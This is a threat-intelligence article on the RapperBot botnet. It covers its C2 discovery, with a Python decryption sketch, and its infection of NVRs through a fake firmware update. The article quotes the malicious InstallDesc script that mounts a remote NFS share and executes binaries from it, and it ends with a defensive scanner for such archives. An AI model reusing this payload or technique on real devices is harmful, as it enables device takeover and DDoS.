Cybersecurity researchers began detecting an alarming surge in early April 2025 in UDP flood traffic emanating from compromised network video recorders (NVRs) and other edge devices.
Within milliseconds of an infection, these devices were weaponized to direct overwhelming volumes of packets at unsuspecting targets, resulting in service disruptions and massive bandwidth consumption.
Bitsight analysts identified this activity as the work of a novel botnet they dubbed RapperBot, noting its unusually rapid kill chain and innovative use of legacy hardware constraints to evade detection.
18-port Ethernet Hub Setup (Source – Bitsight)
The malware's emergence follows a well-recognized pattern: threat actors scan the Internet for exposed web interfaces, brute-force or exploit default credentials, and deliver a malicious payload disguised as a firmware update.
Once executed, RapperBot immediately begins two distinct actions: encrypted DNS TXT record queries to obtain command-and-control (C2) IP addresses, and continuous UDP floods on port 80.
Impact assessments show individual device throughput exceeding 1 Gbps, with aggregated botnet capacity peaking at over 7 Tbps during coordinated campaigns against major targets, including cloud-based search providers and social media platforms.
Despite its potency, the malware's behaviour is elegantly simple: it mounts a remote NFS share to fetch and execute architecture-specific binaries, then self-deletes to run only in memory.
Bitsight researchers noted that this method leverages the minimal BusyBox environment on many IoT devices, where standard download tools like curl or /dev/tcp are absent.
By exploiting the NVR's firmware update mechanism (specifically, a path traversal zero-day in the web server followed by a binary fetch over NFS), RapperBot avoids the usual filesystem artifacts that trigger antivirus alerts.
Firmware Update JSON Payload (Source – Bitsight)
Under the hood, RapperBot's C2 discovery mechanism relies on encrypted TXT records hosted on OpenNIC domains such as iranistrash.libre and pool.rentcheapcars.sbs.
The malware constructs one of 32 predetermined hostnames by selecting randomly from hardcoded subdomain, domain, and TLD lists, then resolves these names against custom DNS servers (1.1.1.1, 8.8.8.8, and others).
The TXT response contains a pipe-separated list of encrypted IP addresses, which the bot decrypts with a custom RC4-like algorithm followed by base-56 decoding.
A Python snippet illustrating the decryption stages appears below:
# Inputs not defined in the page's snippet: encrypted_payload (bytes; the first two
# bytes are consumed before the XOR stage), first_byte_index, second_byte_index.
# Stage 1: Key Scheduling Algorithm (KSA-like) over a 56-element state
S = list(range(56))
key = (first_byte_index + second_byte_index * 56)
for i in range(55, 0, -1):
    key = (0x41C64E6D * key + 0x3039) & 0xFFFFFFFF  # LCG step drives each swap index
    j = key % (i + 1)
    S[i], S[j] = S[j], S[i]
# Stage 2: Keystream-based XOR decryption (RC4-like PRGA); each ciphertext byte
# from offset 2 onward is XORed with the next keystream byte
keystream = bytearray()
i = j = 0
for b in encrypted_payload[2:]:
    i = (i + 1) % 56
    j = (j + S[i]) % 56
    S[i], S[j] = S[j], S[i]
    keystream.append(S[(S[i] + S[j]) % 56] ^ b)
# Stage 3: Base-56 decoding to obtain the plaintext IP list
# (base56_decode is not shown on the page)
plaintext = base56_decode(keystream)
print(plaintext)  # e.g., b"194.226.121.51|188.92.28.62|…"
Getting C2 IP address and connecting to C2 (Source – Bitsight)
Infection Mechanism
RapperBot's infection vector capitalizes on the administrative port (TCP 34567) of vulnerable NVRs.
Upon identifying an exposed device, the attacker exploits a path traversal flaw to download account configuration files, revealing both hashed and plaintext credentials.
With these credentials, the attacker initiates a fake firmware update, sending a ZIP-formatted payload over the proprietary update protocol.
The ZIP archive contains a simple InstallDesc JSON instructing the device to mount 104.194.9.127:/nfs and execute the payload script:
{
  "UpgradeCommand": [
    {
      "Command": "Shell",
      "Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;"
    }
  ]
}
This approach cleverly bypasses the NVR's BusyBox limitations (no wget, curl, or /dev/tcp) by using NFS, a protocol universally supported even on minimal embedded Linux systems.
The script iterates through several ARM architecture binaries until one runs successfully, writes a marker file .r, then cleans up, leaving no on-disk executable.
The immediate execution from the mounted share significantly reduces the forensic footprint and enables the split-second transition from benign device to active DDoS participant.
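The InstallDesc structure above is small enough to inspect before an update is accepted or while triaging a captured archive. The following Python is an added example (not Bitsight's or the NVR vendor's code): it opens an update ZIP, reads its InstallDesc member, and flags any Shell UpgradeCommand whose script mounts a remote NFS export, returning the server and export path. The member name, the archive layout and the sample payload are assumptions constructed to mirror the description on this page.

```python
import io
import json
import re
import zipfile

# Matches "mount ... host:/export" inside one shell command; stops at ; & |
NFS_MOUNT_RE = re.compile(r"\bmount\b[^;&|]*?\s(?P<host>[\w.\-]+):(?P<export>/\S*)")


def find_remote_mounts(install_desc: str) -> list:
    """Return (host, export, script) for every Shell command that mounts a remote export."""
    desc = json.loads(install_desc)
    hits = []
    for cmd in desc.get("UpgradeCommand", []):
        if cmd.get("Command") != "Shell":
            continue
        script = cmd.get("Script", "")
        for m in NFS_MOUNT_RE.finditer(script):
            hits.append((m.group("host"), m.group("export"), script))
    return hits


def scan_update_zip(zip_bytes: bytes) -> list:
    """Inspect every InstallDesc member of an update archive (assumed member name)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.split("/")[-1] == "InstallDesc":
                text = zf.read(name).decode("utf-8", "replace")
                hits.extend(find_remote_mounts(text))
    return hits


# Constructed sample mirroring the payload shown above (not a captured artifact).
SAMPLE_DESC = json.dumps({"UpgradeCommand": [{
    "Command": "Shell",
    "Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;",
}]})


def build_sample_zip() -> bytes:
    """Build an in-memory update archive containing the constructed InstallDesc."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("InstallDesc", SAMPLE_DESC)
    return buf.getvalue()


if __name__ == "__main__":
    for host, export, script in scan_update_zip(build_sample_zip()):
        print(f"remote NFS mount of {host}:{export} in update script: {script}")
```

A benign update should never need to mount a remote export, so any hit is a strong signal on its own, independent of the specific server address.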